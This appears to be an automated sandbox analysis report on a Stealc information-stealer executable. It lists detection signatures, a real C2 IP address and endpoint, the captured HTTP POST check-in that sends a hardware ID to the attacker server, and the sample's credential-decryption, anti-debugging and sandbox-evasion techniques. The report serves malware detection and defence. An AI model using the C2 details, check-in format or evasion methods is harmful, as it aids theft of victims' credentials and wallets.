
Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1523774
MD5:5cace3141ff06d98c584bfb6681a8ae3
SHA1:0993adfa0a320e79a33495bd92c2f457714cca95
SHA256:34e912b828576002110972ce8292a94d4ecebb1582816dcb1414ea2f334827aa
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6792 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5CACE3141FF06D98C584BFB6681A8AE3)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (network capture):
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Yara matches (memory dumps):
Source | Rule | Description | Author | Strings
00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1705421415.0000000004B70000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 6792 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 6792 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Yara matches (unpacked PE files):
Source | Rule | Description | Author | Strings
0.2.file.exe.1c0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
                No Sigma rule has matched
                Suricata IDS alerts:
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-02T02:01:04.104690+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

                AV Detection

                Source: file.exeAvira: detected
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: 0.2.file.exe.1c0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Source: http://185.215.113.37/e2b1563c6670f193.phpkVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/iVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/(Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/wsVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php=Virustotal: Detection: 16%Perma Link
                Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_001CC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_001C7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_001C9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_001C9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_001D8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001D38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001D4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_001CDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_001CE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_001CED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001D4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001CDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_001CBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001CF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001D3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001C16D0

                Networking

                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 42 45 41 37 34 30 37 41 36 46 31 33 35 30 38 32 37 30 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="hwid"4BBEA7407A6F1350827015------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="build"doma------DBFHDBGIEBFIIDGCBFBK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_001C4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 42 45 41 37 34 30 37 41 36 46 31 33 35 30 38 32 37 30 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="hwid"4BBEA7407A6F1350827015------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="build"doma------DBFHDBGIEBFIIDGCBFBK--
                Source: file.exe, 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747423410.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/(
                Source: file.exe, 00000000.00000002.1747423410.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=
                Source: file.exe, 00000000.00000002.1747423410.0000000000E63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
                Source: file.exe, 00000000.00000002.1747423410.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpa-7368302a1ad4
                Source: file.exe, 00000000.00000002.1747423410.0000000000E63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpk
                Source: file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/i
                Source: file.exe, 00000000.00000002.1747423410.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B0010_2_0059B001
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005960310_2_00596031
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050F8C00_2_0050F8C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008561C30_2_008561C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059298B0_2_0059298B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00579ADD0_2_00579ADD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00537AFC0_2_00537AFC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00591AB90_2_00591AB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00655B6A0_2_00655B6A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FA3660_2_004FA366
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A030D0_2_005A030D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00618B3B0_2_00618B3B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0064CC660_2_0064CC66
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059444A0_2_0059444A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059EC670_2_0059EC67
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054D4F80_2_0054D4F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055BCF90_2_0055BCF9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049748B0_2_0049748B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059CC870_2_0059CC87
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051DD620_2_0051DD62
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FD50B0_2_004FD50B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005995900_2_00599590
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A1E410_2_005A1E41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EAE9D0_2_004EAE9D
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 001C45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: epsygglv ZLIB complexity 0.9947550107099143
                Source: file.exe, 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1705421415.0000000004B70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_001D9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_001D3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\JL6S8V7G.htm
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dll
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: file.exeStatic file information: File size 1829888 > 1048576
                Source: file.exeStatic PE information: Raw size of epsygglv is bigger than: 0x100000 < 0x198800

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.1c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;epsygglv:EW;ncsgechg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;epsygglv:EW;ncsgechg:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001D9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cd510 should be: 0x1bf108
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: epsygglv
                Source: file.exeStatic PE information: section name: ncsgechg
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065E047 push 0DB9FF09h; mov dword ptr [esp], edi0_2_0065E04F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065E047 push ebx; mov dword ptr [esp], edx0_2_0065E06D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001DB035 push ecx; ret 0_2_001DB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BE81B push esi; mov dword ptr [esp], 19FA6CA4h0_2_005BE849
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BE81B push eax; mov dword ptr [esp], ecx0_2_005BE8BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BE81B push eax; mov dword ptr [esp], edi0_2_005BE8EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BE81B push edx; mov dword ptr [esp], ecx0_2_005BE938
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065882E push 37069DFFh; mov dword ptr [esp], ecx0_2_006588B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065882E push edx; mov dword ptr [esp], 3BFB14EFh0_2_006589AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065882E push ebx; mov dword ptr [esp], ecx0_2_00658A09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065882E push 4F3373E3h; mov dword ptr [esp], ecx0_2_00658A36
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065882E push edx; mov dword ptr [esp], esp0_2_00658A6B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 693BACF6h; mov dword ptr [esp], eax0_2_0059B02C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 3ED43B63h; mov dword ptr [esp], edx0_2_0059B090
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push esi; mov dword ptr [esp], ecx0_2_0059B154
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push edx; mov dword ptr [esp], ebx0_2_0059B164
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push edi; mov dword ptr [esp], edx0_2_0059B16D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push esi; mov dword ptr [esp], eax0_2_0059B265
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push edx; mov dword ptr [esp], 7B7F4412h0_2_0059B2FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 7CF7AF81h; mov dword ptr [esp], eax0_2_0059B372
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 5EF16101h; mov dword ptr [esp], edx0_2_0059B3F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push eax; mov dword ptr [esp], edi0_2_0059B41C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push ebp; mov dword ptr [esp], esi0_2_0059B450
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push eax; mov dword ptr [esp], ebx0_2_0059B4C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 062C0500h; mov dword ptr [esp], ebp0_2_0059B501
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push edi; mov dword ptr [esp], esi0_2_0059B518
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push edx; mov dword ptr [esp], eax0_2_0059B574
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 58416877h; mov dword ptr [esp], ecx0_2_0059B59B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 48D37672h; mov dword ptr [esp], ecx0_2_0059B5E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 65130D40h; mov dword ptr [esp], edi0_2_0059B64D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push ebx; mov dword ptr [esp], ecx0_2_0059B682
                Source: file.exeStatic PE information: section name: epsygglv entropy: 7.95332225365963

                Boot Survival

                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001D9860

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13611
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 422466 second address: 42246A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42246A second address: 422470 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 422470 second address: 422477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A778D second address: 5A7793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A69D5 second address: 5A69DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A69DB second address: 5A69E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A6CA9 second address: 5A6CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F789C73D5A6h 0x0000000d jns 00007F789C73D5A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A9825 second address: 5A9833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
